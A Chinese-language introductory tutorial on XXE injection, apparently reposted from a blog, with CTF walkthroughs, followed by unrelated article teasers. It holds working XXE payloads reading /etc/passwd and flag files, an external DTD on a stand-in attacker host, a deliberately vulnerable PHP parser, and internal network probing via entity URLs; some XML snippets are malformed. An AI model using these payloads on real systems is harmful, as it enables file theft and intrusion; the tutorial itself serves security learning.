一篇文章帶你入門XXE

1.什么是XXE?

? ?XML External Entity(XXE)攻擊是一種利用 XML 處理器的漏洞,通過引入惡意的外部實體來攻擊應用程序的安全性。這種攻擊通常發生在對用戶提供的 XML 數據進行解析時,攻擊者利用了 XML 規范允許引用外部實體的特性。

? ?在XXE攻擊中,攻擊者通常會構造帶有惡意實體引用的 XML 數據,然后提交給應用程序進行解析。這些惡意實體引用可以指向本地文件系統中的文件、遠程服務器上的資源,甚至是網絡服務,從而導致應用程序執行不安全的操作,比如讀取敏感文件、執行任意代碼等。

? 用一句話總結就是:

XXE攻擊利用XML解析器的漏洞,通過在XML數據中注入惡意實體,使服務器解析時返回敏感信息或執行攻擊者指定的操作。

2.如何利用XXE?

? ?當應用程序對 XML 數據執行解析時,如果未正確配置和處理外部實體引用,就可能存在 XML 實體注入(XXE)漏洞。這種漏洞可以被惡意攻擊者利用來執行各種攻擊,包括讀取敏感文件、執行遠程請求等。

? ? 下面是一個簡單的例子來說明 XXE 漏洞:

? ? ?假設有一個簡單的 XML 文件 example.xml,內容如下:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><content>&xxe;</content>
</root>

? ? 在這個例子中,定義了一個叫做xxe的外部實體,它使用 SYSTEM 聲明引用了一個本地文件 /etc/passwd。然后在 XML 內容中,我們引用了這個外部實體來填充 <content> 元素。

? ? 假設應用程序在接收到這個 XML 文件時,未對外部實體進行適當的限制和過濾,那么在解析這個 XML 文件時就會觸發 XXE 漏洞。攻擊者可以通過構造包含惡意實體引用的 XML 數據,來讀取或者執行系統中的敏感文件,比如 /etc/passw。

3.XML文檔

● XML文檔必須有根元素
● XML文檔必須有關閉標簽
● XML標簽對大小寫敏感
● XML元素必須被正確的嵌套
● XML屬性必須加引號

也就是必須滿足上面的格式xml文檔的內容才會被識別和解析,那么必定會有一個評判的標準,那也就是DTD(document type definition)自動校準,可以是一個獨立的文件,也可以在xml文件里面去聲明。

DTD(內部的引用):

< !DOCTYPE?TranInfo[
<! ELEMENT TranInfo(CdtrInf, DbtrInf,Amt)>
<! ELEMENT CdtrInf(Id,Nm)>
<! ELEMENT DbtrInf(Id, Nm)>

]>

XML文件:

<? xml version="1.0" encoding="UTF-8"?>
<TranInfo>
<CdtrInf>
<Id>6226097558881666</Id>
</CdtrInf>
<Nm>小白</Nm>
<DbtrInf>
<Id>6222083803003983</Id>
<Nm>小黑</Nm>
</DbtrInf>
<Amt>1000</Amt>
</TranInfo>

有沒有發現上面的DTD與下面的XML一一對應的。

外部的引用:

<? xml version="1.0" encoding="UTF-8"?>
<! DOCTYPE name[
!ELEMENT name ANY >
!ENTITY xxe SYSTEM "file:///D:/test/test.dtd" >

]>

<people>
<name>xiaohei</name>
<area>&xxe ;< /area>
</ people>

從這里就會涉及一個外部實體的引用。

外部實體引用協議

常見的使用方式:

1.file:///etc/passwd

2.php://filter/read=convert.base64-encode/resource=index.php

3.http:/www.baidu.com/evil.dtd

4.graphql://api.example.com/graphql

總之:一般完整的XML文件內容:

<!-- 第一部分:XML聲明部分 -- >
<? xml version="1.0"?>

<!-- 第二部分:文檔類型定義 DTD -- >
<! DOCTYPE note[
<!-- 外部實體聲明 -- >
! ENTITY entity-name SYSTEM "URI/URL">
1>

<!-- 第三部分:文檔元素 -- >
<note>
<to>Dave</to>
<from>GiGi</from>
<head>Reminder</head>
<body>fish together</body>
</note>

4.漏洞演示

我們已經知道了XML文檔一般長什么樣,其實最重要的就是外部實體的引用:file:///D:/test/test.dtd

這里面可能會是一個http請求,很可能會導致漏洞出現。

常見的危害就是任意文件讀取,系統命令執行,內網端口探測等

其實還有一個漏洞XXE注入比較茍:

層層嵌套

那就是我在外部引用DTD沒啥問題,但是這個DTD在里面又進行了一次外部實體引用

根據SinHub大佬的說法:

xxe.xml

<? xml version="1.0"?>
<! DOCTYPE a SYSTEM "http://evil3z7.com/evil.dtd">
<c>&b ;< /c>

evil.dtd

<! ENTITY b SYSTEM "file:///etc/passwd">

上面進行了雙重引用\

實戰演練:

<?php

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile?=?file_get_contents('php://input');
if(isset($xmlfile)){
????$dom?=?new?DOMDocument();
????$dom->loadXML($xmlfile,?LIBXML_NOENT?|?LIBXML_DTDLOAD);
????$creds?=?simplexml_import_dom($dom);
????$ctfshow?=?$creds->ctfshow;
????echo?$ctfshow;
}
highlight_file(__FILE__);????

這里就直接bp抓包給一手:

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>
直接拿下。

這里還有一道特別精彩的題目:來自https://www.cnblogs.com/upfine/p/16570120.html

首先:出現一個界面

二話不說直接抓包給一手:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user><username>&file;</username><password>1</password>
</user>

發現沒有用,那就換成其他命令:

包含:/etc/hosts、/proc/net/arp、proc/net/fib_trie等,最終在proc/net/fib_trie發現一個新的ip:10.244.80.202,結果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM ?"file:etc/hosts">
]>
<user>
?? ?<username>&file;</username>
?? ?<password>1</password>
</user>

這里獲得一個新的地址,嘗試下進行連接結果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM ?"http://10.244.80.202/">
]>
<user>
?? ?<username>&file;</username>
?? ?<password>1</password>
</user>

發現鏈接不上,接下來那就嘗試同網段下面的不同地址。

爆破一手

直接拿下。

希望文章能夠幫助到大家,謝謝!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/23510.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/23510.shtml
英文地址,請注明出處:http://en.pswp.cn/web/23510.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

kafka-集群搭建(在docker中搭建)

文章目錄 1、kafka集群搭建1.1、下載鏡像文件1.2、創建zookeeper容器并運行1.3、創建3個kafka容器并運行1.3.1、9095端口1.3.2、9096端口1.3.3、9097端口 1.4、重啟kafka-eagle1.5、查看 efak1.5.1、查看 brokers1.5.2、查看 zookeeper 1、kafka集群搭建 1.1、下載鏡像文件 d…

實時監控電腦屏幕軟件有哪些?(珍藏篇)

在當今的數字化工作環境中&#xff0c;實時監控電腦屏幕軟件是企業管理、遠程協助、教育監控等領域不可或缺的工具。 這些軟件能夠幫助管理者了解員工的工作狀態、提升團隊協作效率、確保數據安全&#xff0c;同時在家庭教育和遠程技術支持中也有廣泛應用。 以下是精選的幾款實…

Python數據框操作 -- 刪除數據(去除空值或者特定值)

先創建一個數據框&#xff1a; import pandas as pd df pd.DataFrame({a:[1,1,np.nan,np.nan,4], b:[5,6,np.nan,8,np.nan]}) 刪除特定值存在的行 數據框刪去特定值所在行&#xff1a; df1 df.drop(df[df[a]4].index, inplace True) 刪除存在空值的行 刪除有空值的所…

創意SQL,高考祝福!一起為學子們加油助威!

&#x1f4e2;&#x1f4e2;&#x1f4e2;&#x1f4e3;&#x1f4e3;&#x1f4e3; 作者&#xff1a;IT邦德 中國DBA聯盟(ACDU)成員&#xff0c;10余年DBA工作經驗&#xff0c; Oracle、PostgreSQL ACE CSDN博客專家及B站知名UP主&#xff0c;全網粉絲10萬 擅長主流Oracle、My…

【java11】java11新特性之嵌套類

Java 11在嵌套類方面主要關注的是通過JEP 181來改進訪問控制&#xff0c;解決之前版本中存在的權限不一致問題。 下面先來看下嵌套類的使用&#xff1a; 靜態嵌套類&#xff08;Static Nested Class&#xff09; 定義&#xff1a;靜態嵌套類&#xff08;也稱為靜態內部類&am…

X-Caps

用于對視覺屬性進行編碼的膠囊 補充信息 數據集太大&#xff0c;不建議復現

【西瓜書】4.決策樹

1 遞歸返回情況 &#xff08;1&#xff09;結點包含樣本全為同一類別 &#xff08;2&#xff09;屬性集為空&#xff0c;沒有屬性可供劃分了 或 有屬性&#xff0c;但是在屬性上劃分的結果都一樣 &#xff08;3&#xff09;結點為空結點 **結束時判定該結點的類別遵循如下規則&…

『哈哥贈書 - 54期』-『架構思維:從程序員到CTO』

文章目錄 ?? 架構思維&#xff1a;從程序員到CTO?? 本書簡介?? 作者簡介?? 編輯推薦?? 不想成為架構師的程序員不是好CTO 在程序員的職業規劃中&#xff0c;成為軟件架構師是一個非常有吸引力的選擇。但是對于如何才能成為一名架構師&#xff0c;不少同學認為只要代碼…

python大作業:實現的簡易股票簡易系統(含源碼、說明和運行截圖)

實現一個簡單的股票交易模擬系統。該系統將包括以下幾個部分: 數據處理:從CSV文件中讀取股票數據。 股票交易算法:實現一個簡單的交易策略。 命令行界面(CLI):允許用戶查看股票數據和進行交易。 數據持久化:將用戶的交易記錄和當前資金存儲在數據庫中。 為了簡化這個示例…

uniadmin引入iconfont報錯

當在uniadmin中引入iconfont后&#xff0c;出現錯誤&#xff1a; [plugin:vite:css] [postcss] Cannot find module ‘E:/UniAdmin/uniAdmin/static/fonts/iconfont.woff2?t1673083050786’ from ‘E:\UniAdmin\uniAdmin\static\fonts\iconfont.css’ 這是需要更改為絕對路徑…

王炸級產品:字節跳動的Seed-TTS

在人工智能的快速發展中&#xff0c;文本到語音&#xff08;TTS&#xff09;技術已成為連接數字世界與人類溝通的重要橋梁。而字節跳動推出的Seed-TTS模型&#xff0c;無疑是這一領域的一個突破性進展&#xff0c;它以其卓越的性能和高度的自然度&#xff0c;被譽為TTS模型中的…

4句話學習-k8s節點是如何注冊到k8s集群并且kubelet拿到k8s證書的

一、kubelet拿著CSR&#xff08;簽名請求&#xff09;使用的是Bootstrap token 二、ControllerManager有一個組件叫CSRAppprovingController&#xff0c;專門來Watch有沒有人來使用我這個api. 三、看到有人拿著Bootstrap token的CSR來簽名請求了&#xff0c;CSRAppprovingContr…

排序---快速排序的4次優化

前言 個人小記 一、代碼 #include<stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #define MAX_ARR 10000000 #define SCOPE 16 #define swap(a,b)\ {\__typeof(a) __ca;\ab,b__c;\ } #define TEST(func,arr,l,r)\ {\printf(&…

父組件調用子組件方法(組合式 API版)

在 Vue 3 中&#xff0c;defineExpose 是一個用于在組合式 API (Composition API) 中暴露組件內部方法或屬性的函數。它允許父組件通過 ref 引用子組件實例&#xff0c;并調用子組件暴露的方法或訪問其屬性。 以下是子組件和父組件如何使用 defineExpose 和 ref 的詳細解釋和示…

如何快速分析并將一個簡單的前后端分離項目跑起來

一、前言 主要是前一段時間有小伙伴問我說自己剛入坑學后端不久&#xff0c;在開源網站上找了個簡單的前后端分離項目&#xff0c;但是自己不會跑起來&#xff0c;讓我給他說說&#xff0c;介于這玩意三兩句話不是很好說清楚&#xff0c;而且不清楚那個小伙伴的知識到何種地步…

規則引擎LiteFlow發布v2.12.1版本,決策路由特性

個人博客&#xff1a;無奈何楊&#xff08;wnhyang&#xff09; 個人語雀&#xff1a;wnhyang 共享語雀&#xff1a;在線知識共享 Github&#xff1a;wnhyang - Overview 簡介 標題其實是不準確的&#xff0c;了解過的會知道在LiteFlow的2.12.0已經有了決策路由的特性&…

【TB作品】MSP430 G2553 單片機口袋板,讀取單片機P1.4電壓顯示,ADC,電壓表

功能 讀取P1.4電壓&#xff0c;顯示到口袋板顯示屏&#xff0c;電壓越高亮燈越多。 部分程序 while (1){ADC10CTL0 | ENC ADC10SC; // Sampling and conversion startLPM0;adcvalue ADC10MEM; //原始數據 0到1023adtest (float) adcvalue / 1024.…

【算法訓練 day48 零錢兌換、完全平方數】

目錄 一、零錢兌換-LeetCode 322思路實現代碼問題總結 二、完全平方數-LeetCode 279思路實現代碼問題總結 一、零錢兌換-LeetCode 322 Leecode鏈接: leetcode 322 文章鏈接: 代碼隨想錄 視頻鏈接: B站 給你一個整數數組 coins &#xff0c;表示不同面額的硬幣&#xff1b;以及…

每一個企業,都值得擁有自己專屬的AI大模型!

前言 在數字化浪潮席卷全球的今天&#xff0c;人工智能&#xff08;AI&#xff09;已不再是遙不可及的科幻概念&#xff0c;而是成為了企業創新、轉型、升級的必備工具。尤其是AI大模型&#xff0c;憑借其強大的數據處理能力和深度學習能力&#xff0c;正在為企業帶來前所未有…

【2024最新華為OD-C/D卷試題匯總】[支持在線評測] 字符串序列判定(100分) - 三語言AC題解(Python/Java/Cpp)

?? 大家好這里是清隆學長 ,一枚熱愛算法的程序員 ? 本系列打算持續跟新華為OD-C/D卷的三語言AC題解 ?? ACM銀牌??| 多次AK大廠筆試 | 編程一對一輔導 ?? 感謝大家的訂閱? 和 喜歡?? ??在線評測鏈接 字符串序列判定(100分) ?? 評測功能需要訂閱專欄后私信聯系…